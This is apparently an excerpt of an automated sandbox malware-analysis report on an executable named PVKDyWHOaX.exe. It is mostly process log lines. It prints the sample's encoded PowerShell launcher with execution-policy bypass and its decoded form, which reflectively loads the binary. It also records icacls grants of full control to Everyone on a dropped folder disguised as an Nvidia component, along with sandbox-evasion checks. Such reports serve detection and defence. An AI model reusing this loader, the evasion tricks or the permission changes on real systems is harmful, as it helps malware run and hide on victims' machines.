Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Nvidia-75619\Nvidia-75619.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 863B3C
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 8AFF3B
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 80DC5E
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 87F043
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 805835
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 802024
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: FA98F0
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 83BC19
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 8668B8
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: F70063
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: F57553
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 83AE54
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: FB5372
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: F1AF05
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: FE4ED4
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 874137
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: FF2354
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 100A09C
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: F45BEE
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: F8370D
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 87FC9D
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 8DE079
Source: C:\Nvidia-75619\Nvidia-75619.exeAPI/Special instruction interceptor: Address: 1032DA9
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeMemory allocated: 16F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeMemory allocated: 1B260000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5648Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4191Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3772Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5296Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exe TID: 7680Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exe TID: 7564Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Nvidia-75619.exe, 00000009.00000003.3099157332.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Nvidia-75619.exe, 00000009.00000003.3098764113.0000000001692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: PVKDyWHOaX.exe, 00000000.00000002.4591980859.00000000015BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}E
Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000006.00000002.3641699104.0000016231C5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3640917763.000001622C62B000.00000004.00000020.00020000.00000000.sdmp, Nvidia-75619.exe, 00000009.00000003.3099157332.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Nvidia-75619.exe, 00000009.00000003.3098764113.0000000001692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Nvidia-75619.exe, 00000009.00000003.3098974236.0000000001662000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: Base64 decoded $x='2cbb654e-5c64-4397-9395-3f64156830fa';$y='C:\Users\alfons\Desktop\PVKDyWHOaX.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: Base64 decoded $x='2cbb654e-5c64-4397-9395-3f64156830fa';$y='C:\Users\alfons\Desktop\PVKDyWHOaX.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }Jump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-75619 /grant Everyone:F /T /CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-75619\Nvidia-75619.exe /grant Everyone:F /T /CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-75619\Nvidia-75619.exe "C:\Nvidia-75619\Nvidia-75619.exe" Jump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand jab4ad0ajwayagmaygbiadyanqa0agualqa1agmanga0ac0anaazadkanwatadkamwa5adualqazagyanga0adeanqa2adgamwawagyayqanadsajab5ad0ajwbdadoaxabvahmazqbyahmaxabhagwazgbvag4acwbcaeqazqbzagsadabvahaaxabqafyaswbeahkavwbiae8ayqbyac4azqb4aguajwa7ahqacgb5acaaewanaaoaiaagagkazgagacgawwbfag4adgbpahiabwbuag0azqbuahqaxqa6adoavgblahiacwbpag8abgauae0ayqbqag8acgagac0azwblacaanaapaa0acgagacaaewagacqabgb1agwabaagad0aiabbafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoavqbuahmayqbmaguatabvageazabgahiabwbtacgajab5ackaiab9acaazqbsahmazqagahsaiaakag4adqbsagwaiaa9acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqargbpagwazqaoacqaeqapah0adqakacaaiaauacaakabbaf8amwayac4axwa4adgaxqa6adoaxwa3adqakaakahgakqapaa0acgagacaazqb4agkadaagacqatabbafmavabfafgasqbuaematwbeaeuadqakah0aiaanaaoaywbhahqaywboacaawwboag8adabtahuacabwag8acgb0aguazabfahgaywblahaadabpag8abgbdaa0acgb7aa0acgagacaavwbyagkadablac0asabvahmadaagaccaqqbwahaababpagmayqb0agkabwbuacaababvagmayqb0agkabwbuacaaaqbzacaadqbuahqacgb1ahmadablagqalgagaemabwbwahkaiabmagkabablacaadabvacaayqagagwabwbjageabaagagqacgbpahyazqasacaayqbuagqaiab0ahiaeqagageazwbhagkabgauaccaiaataeyabwbyaguazwbyag8adqbuagqaqwbvagwabwbyacaaugblagqadqakah0adqakagmayqb0agmaaaagahsadqakacaaiabxahiaaqb0agualqbiag8acwb0acaakaaiaeuacgbyag8acga6acaaigagacsaiaakaf8algbfahgaywblahaadabpag8abgauae0azqbzahmayqbnaguakqagac0argbvahiazqagafiazqbkacaadqakah0a
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand jab4ad0ajwayagmaygbiadyanqa0agualqa1agmanga0ac0anaazadkanwatadkamwa5adualqazagyanga0adeanqa2adgamwawagyayqanadsajab5ad0ajwbdadoaxabvahmazqbyahmaxabhagwazgbvag4acwbcaeqazqbzagsadabvahaaxabqafyaswbeahkavwbiae8ayqbyac4azqb4aguajwa7ahqacgb5acaaewanaaoaiaagagkazgagacgawwbfag4adgbpahiabwbuag0azqbuahqaxqa6adoavgblahiacwbpag8abgauae0ayqbqag8acgagac0azwblacaanaapaa0acgagacaaewagacqabgb1agwabaagad0aiabbafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoavqbuahmayqbmaguatabvageazabgahiabwbtacgajab5ackaiab9acaazqbsahmazqagahsaiaakag4adqbsagwaiaa9acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqargbpagwazqaoacqaeqapah0adqakacaaiaauacaakabbaf8amwayac4axwa4adgaxqa6adoaxwa3adqakaakahgakqapaa0acgagacaazqb4agkadaagacqatabbafmavabfafgasqbuaematwbeaeuadqakah0aiaanaaoaywbhahqaywboacaawwboag8adabtahuacabwag8acgb0aguazabfahgaywblahaadabpag8abgbdaa0acgb7aa0acgagacaavwbyagkadablac0asabvahmadaagaccaqqbwahaababpagmayqb0agkabwbuacaababvagmayqb0agkabwbuacaaaqbzacaadqbuahqacgb1ahmadablagqalgagaemabwbwahkaiabmagkabablacaadabvacaayqagagwabwbjageabaagagqacgbpahyazqasacaayqbuagqaiab0ahiaeqagageazwbhagkabgauaccaiaataeyabwbyaguazwbyag8adqbuagqaqwbvagwabwbyacaaugblagqadqakah0adqakagmayqb0agmaaaagahsadqakacaaiabxahiaaqb0agualqbiag8acwb0acaakaaiaeuacgbyag8acga6acaaigagacsaiaakaf8algbfahgaywblahaadabpag8abgauae0azqbzahmayqbnaguakqagac0argbvahiazqagafiazqbkacaadqakah0aJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeQueries volume information: C:\Users\user\Desktop\PVKDyWHOaX.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\Desktop\PVKDyWHOaX.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
